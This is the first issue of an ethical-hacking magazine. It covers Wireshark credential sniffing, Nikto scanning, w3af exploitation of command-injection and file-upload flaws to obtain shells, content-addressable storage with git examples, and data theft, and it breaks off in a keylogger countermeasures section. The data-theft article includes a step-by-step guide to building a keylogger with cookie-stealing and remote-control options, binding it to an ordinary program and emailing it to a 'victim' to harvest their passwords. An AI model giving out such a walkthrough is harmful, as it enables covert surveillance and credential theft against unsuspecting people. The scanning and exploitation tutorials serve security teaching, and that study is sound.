24th of January 2013

01/2012
1


24th of January 2013


01/2012
3

Dear Readers,
After a long time of preparation we can proudly
present you the first Hack Insight issue. We
decided to start it with Hacking Passwords
because it is the base and first step for every IT
security expert who's developing his hacking
skills.
Two articles have been prepared by Mr. Vikas
Kumar who is an experienced ethical hacker. He
described in details how to use Wireshark, Nicto
and W3af. His research will help us to understand
how to sniff the network traffic and use the most
known network's protocol analyzer - Wireshark.
The second article concerns hacking methods.
Mr.Kumar presented how is the keylogger
working and how to create your own phishing
page. You should definitely check this section out
and think of the danger during daily computer
usage.
Third article written by Mr. Miroslav Ludvik and
Mr. Radek Pilar refers to Content Adressed
Storage. In this issue we will be able to see an
introduction to secure data archiving. In the
second issue, as Miroslav promised, he will
present the content about first vendor
technology - you definitely cannot miss this
article.
This first publication wouldn't be possible without
our magazine's friends who spent a lot of their
working time to take care of this issue. Special
thanks for Ms. Sheryl Checkman, Mr. Timothy
Coleman and Mr. Ty Donaldson. We are grateful
that thanks to your professional advice, attention
to the grammatical correctness and creation of
the creative cover and essential images we can
now read this magazine.
Enjoy the hacking!
Hack Insight Team

[Hack]in(Sight)
Editorial Section:
Authors:
Vikas Kumar,, Miroslav
Ludvik, Radek Pilar.
Proof-reading:
Timothy Coleman, Nina
Takahashi, Agata
Brzozowska.
DTP:
Sheryl Checkman, Ty
Donaldson.
Publisher:
Hack Insight Press Pawe
Pocki
www.hackinsight.org
Editor in Chief:
Pawe Pocki
p.pawel724@gmail.com




All trade marks presented in the
magazine were used
only for informative purposes.
www.hackinsight.org

Page 6: Wireshark is the world's foremost network protocol
analyzer. It lets you capture and interactively browse the traffic
running on a computer network. It is the de facto (and often de
jure) standard across many industries and educational
institutions.
Advanced Usage of Wireshark, Nicto and W3af.
Page 24: Welcome to the mini-series of articles about modern
ways of data archiving. This article will be about CAS (Content
Addressable Storage). The next one will be about archiving and
trustworthy repositories. Then, there will be a few articles
about existing solutions and finally, their comparison.
CAS - introduction
Page 27: Data stealing is the illegal access (by reading, editing,
or copying) of data without the data owners authorization. In
other words, if a companys server has been accessed by a
hacker it is a case of data theft. Even reading the mails of your
colleague would be also taken as a crime in the eyes of law. It is
irrelevant whether you later used this data for misdeeds or not
what counts is that data that is not yours has been
accessed without prior permission of its authorized user who
may also be its creator.
Data Stealing. Data Theft Prevention. Phishing.
Table Of Content
24th of January 2013


01/2012
5
Advanced Usage of Wireshark, Nicto and
W3af.
I. Wireshark:
Wireshark is the world's foremost network
protocol analyzer. It lets you capture and
interactively browse the traffic running on a
computer network. It is the de facto (and often
de jure) standard across many industries and
educational institutions.
Wireshark development thrives thanks to the
contributions of networking experts across the
globe. It is the continuation of a project that
started in 1998.
Figure 1.image of Wireshark with logo
Wireshark, formerly known as Ethereal, is one of
the most powerful tools in a network security
analyst's toolkit. As a network packet analyzer,
Wireshark can peer inside the network and
examine the details of traffic at a variety of levels,
ranging from connection-level information to the
bits comprising a single packet. This flexibility and
depth of inspection allows the valuable tool to
analyze security events and troubleshoot network
security device issues.
Packet Analysis Made Easy
Visually rich, powerful LAN analyzer
Quickly access very large pcap files
Professional, customizable reports
Advanced triggers and alerts
Fully integrated with Wireshark
The Role of A Network Protocol Analyzer
Network Protocol Analysers like Wireshark let us
look at the behaviors of network protocols. This
can be useful for 3 main reasons:
1. Observing the network traffic generated
by protocols, services, applications etc,
helps us gain a better understanding of
how these various things work.
2. The ability to observe exactly what is
happening over a network can also often
help us gain a better understanding of a
problem we are troubleshooting.
3. Finally the ability to monitor network
traffic can help us identify threats to or
breaches of network security.
How to sniff network traffic and why sniff the
network?
The phrase "sniff the network" may conjure
Orwellian visions of a Big Brother network
administrator reading people's private email
messages. Before anyone uses Wireshark, an
organization should ensure that it has a clearly
defined privacy policy that spells out the rights of
individuals using its network, grants permission to
sniff traffic for security and troubleshooting
issues, and states the organization's policy
requirements for obtaining, analyzing and
retaining network traffic dumps. Anyone who
uses a tool like Wireshark without first obtaining
the necessary permissions may quickly find
themselves in hot water legally.
However, as a security professional, there are
two important reasons to sniff network traffic.
First, peering into the details of packets can prove
invaluable when dissecting a network attack and
designing countermeasures. For example, if a
denial of service occurs, Wireshark can be used to
identify the specific type of attack. The tool can
then craft upstream firewall rules that block the
unwanted traffic. The second major use of
Wireshark is to troubleshoot security devices.
Specifically, I regularly use it to troubleshoot
firewall rules. If systems running Wireshark are
connected to either side of a firewall, it's easy to
see which packets successfully traverse the
device and identify whether the firewall is the
cause of connectivity problems.
That being said, it's important to remember that
Wireshark can be used for good or for evil, as is
the case with many security analyzers. In the
hands of a network or security administrator it's a
valuable troubleshooting tool. In the hands of
someone with questionable ethics, however, it's
a powerful eavesdropping tool that enables
someone to view every packet that traverses the
network.
Downloading & Installing Wireshark

If you dont already have Wireshark Installed on
your computer you can download it from the
Wireshark Website at http://www.wireshark.org.

Figure 2. Available Interfaces
Figure 3. Interface Selection for capturing data
packets.
Security Note: It is best practice to download
software only from the official site of the
developer, there are many other sites which offer
Wireshark downloads, my advice is to avoid them
as you cant know whether the software you are
downloading has been altered in a malicious way
by the third party site.
The installation is straight forward, and for most
people you should be able to run the installer and
simply click next through the whole process.

Running a simple packet capture

Once Wireshark is installed, start it up and
you'll be presented with the blank screen in
which you are to select your interface on which
you want to capture data packets is shown
below:


24th of January 2013


01/2012
7

Click the Start button next to the name of the
interface on which you wish to capture traffic,
and immediately you will see Wireshark filling up
with traffic as shown on picture below.
Figure 4. Wireshark traffic
Interpreting the results with Wireshark color
codes
Each line in the top pane of the Wireshark
window corresponds to a single packet seen on
the network. The default display shows the time
of the packet (relative to the initiation of the
capture), the source and destination IP addresses,
the protocol used and some information about
the packet. You can drill down and obtain more
information by clicking on a row. This causes the
bottom two window panes to fill with
information.
The middle pane contains
drill-down details on the
packet selected in the top
frame. The "+" icons reveal
varying levels of detail
about each layer of
information contained
within the packet. In the
example above, I've
selected a DNS response
packet. I've expanded the DNS response
(application layer) section of the packet to show
that the original was requesting a DNS resolution
for www.cnn.com, and this response is informing
us that the available IP addresses include
64.236.91.21. The bottom window pane shows
the contents of the packet in both hexadecimal
and ASCII representations.
Wireshark color codes
Color is your friend when analyzing packets with
Wireshark. Notice in the example above that each
row is color-coded. The darker blue rows
correspond to DNS traffic, the lighter blue rows
are UDP SNMP traffic, and the green rows signify
HTTP traffic. Wireshark includes a complex color-
coding scheme (which you can customize). The
default settings appear below:
Figure 5. Wireshark color coding

Wireshark is already capturing data packets, so lets test if it will work supposed to ping with any system in
the network so Wireshark will capture ICMP data packets:
Figure 6. Pinging from ip 192.168.152.130 to target system ip 192.168.152.128
Figure 7. ICMP data packet filtration with echo request & reply

Wireshark is already capturing
data packets, so lets test if it
will work suppose I was logging
in www.jammuclubjammu.com




Figure 8. Putting credentials in login account

24th of January 2013


01/2012
9
Filter data packets. For this tutorial I have used HTTP as it is shown below.
NOTE: there are so many protocols you can use to filter data packets (e.g. FTP)
Figure 9. Finding HTTP data packets through filtration.

Now look for Post, select it
Right click or go to Analyze menu and then select Follow TCP Stream
Figure 10. Finding HTTP data packets through filtration.

You should now see this window, just scroll down until you see username and password. As you can see, I
managed to capture my username and password.
Figure 11. TCP Stream window will show credentials
FTP Data Packet Capturing with login Credentials
Now we are going to capture data packets of FTP protocol so for that we are using a cmd prompt for login
into ftp account of jammuclubjammu.com web server.
Figure 12. FTP Login with cmd.

We have entered credential and side by side our Wireshark is capturing all the data packets.
Figure 13. Login into FTP account with credentials.

24th of January 2013


01/2012
11

Now we will resolve the data packets of FTP protocol for which first of all we all will filter all ftp data
packets which is given below:
Figure 14. FTP data packet filtration.

Now we will resolve these data packets for which we are to right click on ftp data packet and click on
follow TCP Stream
Figure 15. FTP data packet resolved and credentials in txt format.
Filtering Packets
If youre trying to inspect something specific, such as the traffic a program sends when phoning home, it
helps to close down all other applications using the network so you can narrow down the traffic. Still, youll
likely have a large amount of packets to sift through. Thats where Wiresharks filters come in.
The most basic way to apply a filter is by typing it into the filter box at the top of the window and clicking
Apply (or pressing Enter). For example, type ip.src == 192.168152.130 and youll see only IP Source
192.168.152.130 data packets. When you start typing, Wireshark will help you autocomplete your filter.
Figure 16. Data Packet filtration of ip.scr == 192.168.152.130

Next filtration DNS
Figure 17. Data Packet filtration of DNS

24th of January 2013


01/2012
13

Inspecting Packets
Click a packet to select it and you can dig down to view its details.

Figure 18. Data Packet Inspecting

You can also create filters from here just right-click one of the details and use the Apply as Filter
submenu to create a filter based on it.

Figure 19. Apply as Filtration.
Wireshark is an extremely powerful tool, and this tutorial is just scratching the surface of what you can do
with it. Professionals use it to debug network protocol implementations, examine security problems and
inspect network protocol internals.
II. Nicto:
Introduction
Nikto is an open source web server scanner
which performs comprehensive tests against
web servers for multiple items, including over
6400 potentially dangerous files or CGIs, checks
for outdated versions of over 1200 servers, and
version specific problems on over 270 servers."
The good thing about Nikto is that it easy to use
and performs scanning faster. Nikto is coded in
Perl and written by Chris Sullo and David Lodge.
Although not all checks are really a big security
problem but most are like XSS (Cross Site
Scripting) Vulnerabilities, phpmyadmin logins,
etc. Nikto alerts and gives you security tips in
order to prevent your website from various
attacks.
Nikto is not
designed as an
overly stealthy tool.
It will test a web
server in the
quickest time
possible, and is
fairly obvious in log
files. However,
there is support for
LibWhisker's anti-
IDS methods in case
you want to give it a
try (or test your IDS
system).
Not every check is a security problem, though
most are. There are some items that are "info
only" type checks that look for things that
may not have a security flaw, but the
webmaster or security engineer may not
know are present on the server. These items
are usually marked appropriately in the
information printed. There are also some
checks for unknown items which have been
seen scanned for in log files.
So if you are using Backtrack to practice pen-
testing then you needn't worry about
installing Nikto as it is already there in
Backtrack (Its there even in Backtrack 4).
But if you aren't using Backtrack, then you can
download Nikto from the website

http://www.cirt.net/nikto2

Make sure you have Perl installed because Nikto
is a Perl Script.
You can run Nikto in two ways:
1. Go to
Applications>Backtrack>Vulnerability
Assessment>Web Application
Assessment>Web Vulnerabilities
Scanner>Nikto
2. cd /pentest/web/nikto/
Simply ,
root@bt:cd /pentest/web/nikto
root@bt:/pentest/web/nikto# ./nikto.pl -H
Figure 20. Nikto Options of help

Figure 21. Nikto Options of help

24th of January 2013


01/2012
15
root@bt:/pentest/web
/nikto# ./nikto.pl -
host 10.x.x.52 -
output kioptrix_80.txt

If we give command
./nikto.pl -Help or
perl nikto.pl -Help
then we get details
and all options.
Simply We are going
to scan a target
website, because we
are pentesting it. So
easy:





Figure 22. Nikto scanning target website
Figure 23. Nikto Scanning result.

Now you will get a output file in txt format which you can open for reading purpose by giving steps
root@bt:/pentest/web/nikto# . / Niktorat kioptrix_80.txt kioptrix_80
Figure 24. Nikto output file.

In order to run a simple vulnerability scan against a target you just have to specify a host address
along with a port number.

For example, perl nikto.pl -h 10.10.15.27 -p 32333
Figure 25. Nikto scanning a web server based on port.
24th of January 2013


01/2012
17

In the above command :

-h switch implies host address.
-p switch implies port number.

The above command runs a vulnerability scan
against the host 10.10.155.27.
But since we specified the port number as
32333,Nikto scans that particular port only.
Now if you want the scan to include multiple
ports you have to specify a port range :

perl nikto.pl -h 10.10.15.27 -p 1024-10000

What if you don't specify any port?

perl nikto.pl -h 10.10.15.27
Figure 25. Nikto scanning a web server without
specifying port

In this case Nikto just scans port 80.
Are these the only switches that Nikto has to
offer (i.e. -h and -p)? No it offers wide variety
of switches.
Just type perl nikto.pl to check the amount of
options Nikto offers.
Figure 26. Nikto scanning options for scanning
target website to use.
III. W3af:
Security is key point for every effective business,
either you are running your own website or you
are at job to manage the web application for your
company you have to do little penetration testing
to check the security of web application.
Now a days exploit are available and update on
daily basis for different web application services.

While doing a penetration testing a pen tester
must consider these exploit for different
vulnerabilities.
To find vulnerabilities is not enough a pen-tester
must check the parallel exploits that are available
publicly for different services.

w3af (Web Application audit and attack
framework) is a framework for auditing and
exploitation of web applications. In this series
of articles we will be looking at almost all the
features that w3af has to offer and discuss how
to use them for Web application Penetration
testing. In the first part of this series we will be
working with w3af console and getting ourselves
familiar with the commands. We will also be
looking at the different types of plugins that w3af
has to offer and discuss how to use them for
optimal performance.
W3af stands for web auditing and attack
framework. I have heard some say that it is the
metasploit for web applications. W3af is basically
a free open source web application scanner.
W3af has many plugins that are divided into
attack, audit, exploit, discovery, evasion, brute
force, mangle and a few others. The code is well
commented and written in python so writing your
own exploits and plugins should be trivial.
Some of the major features of w3af are:
1. It has plugins that communicate with each
other. For eg. the discovery plugin in w3af
looks for different urls to test for
vulnerabilities and passes it on to the audit
plugin which then uses these URLs to search
for vulnerabilities.
2. It removes some of the headaches involved in
Manual web application testing through its
Fuzzy and Manual request generator feature.
It can also be configured to run as a MITM
proxy. The requests intercepted can be sent
to the request generator and then manual
web application testing can be performed
using variable parameters
3. It also has features to exploit the
vulnerabilities that it finds.
Figure 27. W3af (Web Application Attack and
Audit Framework)
step is to give the url to w3af and scan it for XSS
vulnerabilities. Open up w3af GUI. Once it is
open, on the left hand side, we can see an option
to choose from various profiles.
Figure 28. W3af profile selection.

We can choose any profile from the list
depending on our need, as well as the time
availability. These profiles already has
configurations to use some specific plugins for
a particular task. For e.g if we if look the profile
OWASP_TOP10, we will see that it uses several
of the Audit, Grep and Discovery plugins to
perform its tasks.


Figure 29. W3af Plug-ins selection for scanning
target url
For the time being, we are going to use an Empty
profile as we just want to check a single url for an
XSS vulnerability. Note that this is usually not the
way in which we will use the w3af framework. In
a real world environment, we will choose some
specific discovery plugins to find different urls to
check for injections, auth plugins to automatically
log in to forms and crawl ahead, grep plugins to
look for interesting information in the response,
and audit plugins to scan for vulnerabilities in the
found injection points.
Type in the url in the target field and choose
the xss plugin from the audit plugins.
Figure 30. URL scanning

Once this is done, click on Start. This will start the
scan on the given url. As we can see from the
output, it found a XSS vulnerability.






24th of January 2013


01/2012
19
Figure 31. W3af scanning result
If you are interested in knowing what actually
happened, go to the Results Tab. Click on xss on
the left side. On the right side, you can see a
description of how the vulnerability was found.
On the bottom right, you can also see the request
and response which led to the identification of
the vulnerability. It is a very good practice to look
at the requests and responses sent through by
w3af as this lets us know whats going on under
the hood.
Figure 32. W3af Vulnerability description

So basically what happened was that w3af
sent JavaScript strings to every parameter
in the url, and then checked for those
strings in the response. In case of stored
XSS, w3af takes a note of the injected
string and makes a request again to the url
looking for that string. If it finds that string, then a
stored XSS has been identified.
Lets now use an OS commanding vulnerability to
obtain a shell on the system. From the OS
commanding section in the w3af test
environment, choose a url and give it as target to
w3af. Under the audit plugins section, check the
OS commanding plugin.




Figure 33. W3af OS Command for obtaining
shell of target URL.

Figure 34. OS Command vulnerability output

Once this is done, click on start to launch the
vulnerability scan. As we can see from the output,
w3af identified an OS commanding vulnerability.

w3af supports detection of both simple and blind
OS commanding vulnerability. In simple OS
commanding, it sends a simple command to
every parameter and then looks for a response to
that command in the output. In case of blind OS
commanding in which the response is not present
in the output, it uses time delays to identify if a
vulnerability is present. For e.g if it sends a
command which delays the response for some
seconds, and if we note a delay in the output, we
Figure 35. Vulnerability identification


can say that a blind OS commanding vulnerability
is present. Again, in the results section, we can
see the request and the response which led to
identification of the vulnerability.
w3af also allows us to exploit vulnerabilities. If we
go under the Exploit section, we can see the
identified vulnerability in
the Vulnerabilities section. If we click on it, we
can see that osCommandingShell in the Exploits
section turns black. This is an indication that the
vulnerability can be exploited using the
osCommandingShell plugin in w3af. Right click on
osCommandingShell and click on Exploit ALL
vulns.

24th of January 2013


01/2012
21
Figure 36. W3af vulnerability exploitation.
Once this is done, if the vulnerability is exploited successfully, we will get a shell on the target machine. We
can see the list of shells on the right side. Note that it is not possible to get a shell in case of every
vulnerability.
Just double click on the shell and you are all set and ready to go.
Figure 37. Shell execution
Similarly, lets use a file upload vulnerability to get a shell. Give the vulnerable url as a target to w3af. Make
sure, the fileUpload plugin is checked in the audit plugins list.

Figure 38. FileUpload Plug-ins list.

Also make sure to check the extensions option in the fileUpload plugin. Since in some cases, the web
application allows only some specific extensions, it would be favorable to add those extensions to the list
as well.

Figure 39. Specifying extensions for web application

Click on Start. As we can see from the output, w3af identified a file Upload vulnerability.

Figure 40. FileUpload vulnerability identification.

Click on the Results Tab. You can see that w3af tried to upload a file named w3af_dt4LqT.html. It did this
by sending the file object in the uploadedfile parameter. It then looked for these files in common
directories like uploads etc. If the file is found, then it can be said that a Insecure File Upload vulnerability
exists. However, this is not always the case as most of the web application filter files based on their
extension. To bypass this w3af has templates for some of the most common file extensions. These
templates have valid extensions but have a section that can be replaced with scripting code. The figure
below shows the files with different extensions present in w3af.

Figure 41. FileUpload templets

If we open up any of these files with Kate, we can see the content inside it. As we can see from the figure
below, the file template.png has a string of As in its comment section. This string can actually be replaced
by scripting code like php.

Figure 42. String replacement.

With all of these basics out of the way, lets exploit this vulnerability using the fileUploadShell plugin. You
can also set the configuration of these plugins by right clicking on them and clicking on Configure the
plugin.
As we can see from the figure below, the vulnerability was successfully exploited and we got a shell on the
target machine.
24th of January 2013


01/2012
23

Figure 43. Vulnerability exploitation.

Similarly you can perform tests for many other exploits like Local File Inclusion, Remote File Inclusion, SQL
Injection etc.










VIKAS KUMAR (ISHAN) is one of the leading computer
security experts available in India. VIKAS KUMAR born
on 26 July 1990 in a town called Meerut, UP (India).
VIKAS KUMAR started his Group hackers4u on
Facebook in year 2010 and in two years he bangs the
World Wide Web with good computer ethical hacking
articles and going to launch the website on Cyber
Security & Ethical Hacking and working with a Anti-
Hacking Community I-hackers4u. The 22 year old
guy have the capability to compete with the people
best in the business so called Ethical Hacking.

Workshops and Seminars: VIKAS KUMAR have trained
more than 3000 people from all around the world,
from countries like India, Dubai, Sudan, United
Kingdom, Thailand, Nigeria, Shri Lanka, Kenya,
Australia, Kazakhstan, Canada, Ghana, United States,
South Africa, China, Malaysia, Singapore, Omen,
Yemen, Indonesia, Korea, Iran and etc.
www.cyber-hunt.com

Blog: - www.cyber-hunt2012.blogspot.com

LinkedIn Profile:-
https://www.linkedin.com/profile/view?id=71569482
&trk=tab_pro

Facebook:- https://www.facebook.com/hackers4u
BackTrack Fan Club Page:-
https://www.facebook.com/pages/Cyber-Hunt-
BackTrack-Fan-

Club/395372283859684?ref=tn_tnmn

Facebook Page:-
https://www.facebook.com/vikas7852?ref=tn_tnmn

Email ID:- vikas_ind2008@yahoo.in
cyberhunt2012@gmail.com

About the author
CAS introduction

Abstract:
Welcome to the mini-series of articles about modern ways of data archiving. This article will be about CAS
(Content Addressable Storage). The next one will be about archiving and trustworthy repositories. Then,
there will be a few articles about existing solutions and finally, their comparison.

Typical filesystems use name and path to
uniquely identify astored object (which can be
file, directory, symlink, etc.). This approach has
few advantages, but also few disadvantages that
CAS systems aim to fix. CAS, as its name implies,
identifies the object by its content. Of course, it
wouldn't be practically feasible to use the whole
content of the object in that case, storing the
file would be pointless. Instead of it, CAS systems
use cryptographic hash of the content. So, if we
want to access the file with content Balance for
the year 2012, instead of file:
/home/accountant/docs/balance2012.doc

or on Windows:
C:\Users\Accountant\Documents\balance2012.doc

we accessobject identified by string:
cd52089ea948bd42fece0ebba0c91b5ae68169e4

which is, in this example SHA-1 hash of its
content. Because with that approach, you'd lose
some information (filename, author, creation
date), the CAS system attaches metadata to
objects.
The first CAS system ever was introduced in 2003
by US company EMC under name Centera, but
was immediately followed by similar products
from other vendors like HP, Hitachi, Oracle/Sun,
Dell and others. Today, CAS is used as a de-facto
standard for a long-term data archiving. CAS-
based solutions have several advantages. Since
the system works with file hashes instead of
filenames, it is much more difficult to tamper
data (even from the sysadmin perspective): It is
really easy to save a different file with the same
name, but really difficult to save a different file
with the same hash. And on the other side two
files with the same contents will have the same
hash therefore, there will be only one copy
stored in the system. This effectively supersedes
file-level deduplication, the non-existence of
multiple copies of the same file is implied by the
basic principles of the system itself. However, the
CAS systems have their disadvantages as well. If
the user wants to modify already stored object, it
involves copying its contents, modification,
reading the whole file, hash calculation and final
write. Even if we change just a single byte from
the multi-megabyte file, we still need to re-read
the whole file and compute a new hash.
However, considering current prices of the
hardware, this disadvantage vanishes and is
merely theoretical. The second mentioned
disadvantage is the existence of hash collisions.
Since the hash functions generates for the input
of arbitrary length output of fixed length, loss of
information occurs. Therefore there exists
multiple different inputs with the same hash. And
it depends only on the specific implementation of
the CAS system, how it will handle the collision.
The odds collision will occur can be estimated
from the length of hash function output. For
example, the MD5 hashing algorithm always
returns 128bit value. Therefore,
24th of January 2013


01/2012
25
chance the two randomly chosen objects will
have the same hash is 1:2^128. 2^128 is also the
theoretical upper limit CAS system can store.
However, if someone will want to create his own
file, different from ours, with the same hash
(preimage attack), he'll need approx. 2^123
computations. The worst situation happens when
someone will want to create two arbitrary files
with the same hash in that case, only 2^21
operations will be necessary. Fortunately, there
exists more secure algorithms like SHA-1 which
has output size of 160bits, with no known
reimage attack faster than bruteforce (2^160)
and with fastest collision-discovery attack with
complexit 2^61. The dangers of using this
hashing algorithm is almost non-existent with
current technology and knowledge. And in case
you've thought about distributed version control
systems when reading this article you were
right. Most of the distributed VCSs use some kind
of CAS as backend. I'll use some low-level git
commands to demonstrate basic principles of
CAS:
Listing 1. Creating empty git repository.



# Create empty git repository
$ git init
Initialized empty Git repository in /tmp/example/.git/
# Objects are stored in .git/objects
$ ls .git/objects/
info pack
# Create example file
$ cat > foo.txt << EOF
Lorem ipsum dolor sit amet.
EOF
# Store example file to database
$ git hash-object -w foo.txtd2cf010d36ff3f5a199c335135f37ca40822b35b
# We try to manually calculate SHA1 hash of the file(note.: git prefixes the contents with:
"blobcontent_len\0x00")
$ echo -e "blob 28\0Lorem ipsum dolor sit amet."|sha1sum
d2cf010d36ff3f5a199c335135f37ca40822b35b -
# We see hashes are equal. Let's look at .git/objects
$ ls .git/objects/*
Listing 2. Creating empty git repository II
Enterprise solutions use CAS as a backend for a more complex system implementing data replication,
etention, secure shredding and other functions these will be mentioned in following articles.
Mr. Miroslav Ludvik
graduated at Czech Technical University in 1996.
In 2005 he succesfully defended his Ph.D. thesis
on Data Security in Comupter Networks and I was
awarded Ph.D. degree. In 2000 he participated on
securing the International Monetary Fund
conference in Prague. He provides counseling to
Ministry of Interior of the Czech Republic and
Czech Data Protection Office. He provides also
counseling for private sector and among my client
are e.g. bank and prestigious legal fi ms. He
teaching on prestige private Czech University and
cooperate with University of ilina. He holds an
office of Technical Director in the 4safety, a.s
company.
Mr. Radek Pilar
is currently studying at Czech Technical
University, Prague and is employed as a storage
consultant n the 4safety, a.s company.



.git/objects/d2:
cf010d36ff3f5a199c335135f37ca40822b35b
# Using the content hash, we can request the content.
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
# Filename is not important
$ cp foo.txt bar.txt
$ git hash-object -w bar.txt
d2cf010d36ff3f5a199c335135f37ca40822b35b
# But the content is
$ echo "foobar" > foo.txt
$ git hash-object -w foo.txt
323fae03f4606ea9991df8befbb2fca795e648fa

# And the original file will remain unchanged
$ git cat-file -p d2cf010d36ff3f5a199c335135f37ca40822b35b
Lorem ipsum dolor sit amet.
$ git cat-file -p 323fae03f4606ea9991df8befbb2fca795e648fa
foobar
About the authors
24th of January 2013


01/2012
27

Data Stealing. Data Theft Prevention.
Phishing.

Data stealing is the illegal access (by reading, editing, or copying) of data without the data owners
authorization. In other words, if a companys server has been accessed by a hacker it is a case of data theft.
Even reading the mails of your colleague would be also taken as a crime in the eyes of law. It is irrelevant
whether you later used this data for misdeeds or not what counts is that data that is not yours has been
accessed without prior permission of its authorized user who may also be its creator.
"One of the way of hacking Data Stealing is
DDoSes which has evolved from being a blunt-
forced attack to being a sophisticated
diversionary attack disguising another attack."
Sources said that financial service companies
handling vast amount of data are most
susceptible to these tactics.
Figure 1: Data Theft.
In the past year, for example, phishing attacks
have been directed at IT administrators at
European banks. These eventually enabled
malware to penetrate the banks' systems and
steal login credentials.
As soon as the criminals had the login details,
they launched the DDoS attacks against the
banks. This was carefully timed so that it occurred
on a Friday afternoon when IT departments were
thinly staffed.
"Once the attack was launched, the IT
department predictably moved resources to deal
with DDoS attack,".
While this was happening, the cybercriminals
launched the real attack, which allowed them to
grab and clone private data that could be used to
steal money.
They then handed the operation over to the
monetization team, who created ATM cards,
debit cards and credit cards, which were handed
out to money mules.
The cybercriminal gang hired individual
contractors who took the cards to ATM machines
and drained $9m in 48 hours from a selection of
accounts in cities across the world.

Types of Data Theft
Data can be stolen in many ways. Below you can
see a few examples showing the ways of data
theft.

Hacking: This is by far the most common way of
stealing data with the least chances of getting
caught. A hacker gets into a system where he or
she is not supposed to be and steals whatever
data he needs. Hackers find their gate way
through gaps in the security system or by
hoodwinking gullible employees / surfers in order
to gain access to a system.

Posing: Appearances can be deceiving. The
attractive website that has popped up offering
you a great holiday treat may actually be a data
thief trying to get into your system under the
mask of a piece of harmless spam. In a case of
corporate data theft last year, the thief posed as
a potential customer and got an entry to a
companys data bank through the computer of an
employee who did not suspect anything in his
eagerness to catch a potential client.

Remote Access: Is the cursor moving about on its
own even when you have not touched the
mouse? Does the indicator show that a program
is running even when you are not working on
anything and have no windows opened? Do not
ignore the symptoms a data thief is already
sitting in your computer. Remote access allows
the thief to gain control of your machine from
wherever he or she is and operate it, steal data
from it, and even distribute virus from it!

Spyware: Spyware is often brought in by adware.
The thief may not sit in your system, but your key
strokes or mouse clicks would be spied upon,
revealing what you are doing and reading the
data as you put it in. And you have opened the
gate by clicking on an innocent looking ad.

Podslurpling: Music is now stored in iPods for
almost all domestic users. You would usually not
suspect an employee rocking to music while
working as usual. The thief knows this and he is
using the iPod to obtain data outputs from the
computer where it is plugged in.

Blue Snarfing: Bluetooth devices have become
popular in a very short while. Using his or her
Bluetooth-enabled cell phone or laptop, the data
thief lifts data from a restricted computer in
silence and mostly unnoticed.

Thumsucking: Another tiny and dangerous device
is the USB storage drive. All that an employee
needs to do is plug in a pen drive, and 2 GB of
data would flow in quietly into the pocket from
the computer.
Prevent Data Theft
At any time of day or night, a huge amount of
data is being stored, retrieved and transferred in
the average company or organization. As a
responsible user, you must know how to protect
your data and prevent data theft from mobile
devices. The following targets for thieves and
intruders are:
USB thumb drive
3G mobile phone network
Wireless LAN
Removable hard disk
Notebook computer
Portable personal digital device like MP3,
PDA, Phones
Printer output etc.
Personal information such as bank
account or details
Customer database
Confidential/sensitive business
information e.g. tender information and
quoted prices.
The Following are some useful security tips for
preventing data theft:
Protect your mobile devices
Data theft sometimes happens when you
outsource your IT services. Learn how to
prevent data loss from IT outsourcing.
Review the access control policy
Encrypt your data.
Protect your wireless network.
Secure your company network.
Conduct security risk assessments and
regular security audits.

Figure 2: Preventing from Data Theft.


24th of January 2013


01/2012
29
Keylogger
Key logger software is a
computer monitoring system
that allows you to record
entire activities performed on
your computer system. Key
logger software has an ability
to monitor online chat
conversation details, visited
websites, incoming and
outgoing emails and other
online activities performed on
your pc. The log file created
by the key logger can be sent
to a specified receiver. Some
key logger programs will also
record any e-mail addresses
you use and Web
site URLs you visit.

Key loggers, as a surveillance
tool, are often used by
employers to ensure
employees use work
computers for business
purposes only. Unfortunately,
key loggers can also be
embedded n spyware allowing
your information to be
transmitted to an unknown
third part.

Computer monitoring
software works in invisible
mode and does not appear on
the Desktop, Add/Remove
Programs, Control panel and
even in the hidden during the
installation path folders.
Keyloggers software provides
facility to send details of
recorded activities at user specified email address. Free keylogger
download is available on the website.
How to hack ID's with Rin Logger
Run the keylogger file on your pc and click on Create new

Figure 3: Create New for creating server.exe file.

Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next

Figure 4: Set information for getting keylogs.
Now, enter the time duration between two
emails. If you set it to 2 minutes, you will receive
emails after every 2 minutes. Hit on Next.
Figure 5: Set timing for getting keylogs.
Now, change Install keylogger to Enabled.
Name the file anything you want and select
Installation path as Application data.
Click on next option of downloader setup which
will help you to download your files off the
internet and internet launch it.
Figure 7: Set Download Setup.
Create a custom message for making your victim
fool and click on next.
Figure 8: Set Dialog setup for setting message
for victim.
Click on website enable viewer for getting all the
updates of all the website which are being visited
by victim.
24th of January 2013


01/2012
31
Figure 9: Set Website Viewer option for update
of web links.

Select this option for binding our file with other
file and click on next .
Figure 10: Bind your server.exe file with other
file.

This option can help you retrieving passwords
from cookies of web browser and click on next.
Figure 11: Set option for stealing cookies from
web browser.

Use this option to get the administrative control
of your victim system and as per your choice and
requirement just enable and click on next.
Figure 12: Use administrative control options.

You can use all other options according to your
needs. But, I am focusing only on the important
aspects. Hit on Next until you see this option:
Hit on ? button besides every textbox to
generate random product information. Hit on
Next.
Figure 13: Bind your server.exe file with other
file.

Now, hit on Save As and select the path where
you want to save your keylogger server file. Click
on Compile. Done!!!
Figure 14: Save server.exe file.

Thats it. You have successfully created a
keylogger server file. Now, simply send this file to
your friend. You can use the Binder within this
keylogger or can even opt for Iexpress binder to
bind this keylogger server to any .exe file may be
software or so. This will remove any chances of
doubt on victims side.
Figure 15: Successfully created file.
Now, simply send this file to your victim via email.
Once the victim runs our keylogger, we will get
key logs every 2min via email as shown

Thus, the victim will run the file considering it as a
normal software installation and during this
process, our sent keylogger server will install
itself silently in background without any victims
knowledge.

After keylogger server
installation, you will start
receiving all victims passwords
like this:


24th of January 2013


01/2012
33


Figure 16: Online logs on email ID.

Countermeasures
The effectiveness of countermeasures varies,
because keyloggers use a variety of techniques to
capture data and the countermeasure needs to
be effective against the particular data capture
technique. For example, an on-screen keyboard
will be effective against hardware keyloggers,
transparency will defeat some screen loggers -
but not all of them - and an anti-
spyware application that can only disable hook-
based keyloggers will be ineffective against
kernel-based keyloggers.
Moreover, keylogger software authors may be
able to update the code to adapt to
countermeasures that may have proven to be
effective against them.
Anti keyloggers
An anti keylogger is a piece
of software specifically designed to detect
keyloggers on a computer, typically comparing all
files in the computer against a database of
keyloggers looking for similarities which might
signal the presence of a hidden keylogger. As anti
keyloggers have been designed specifically to
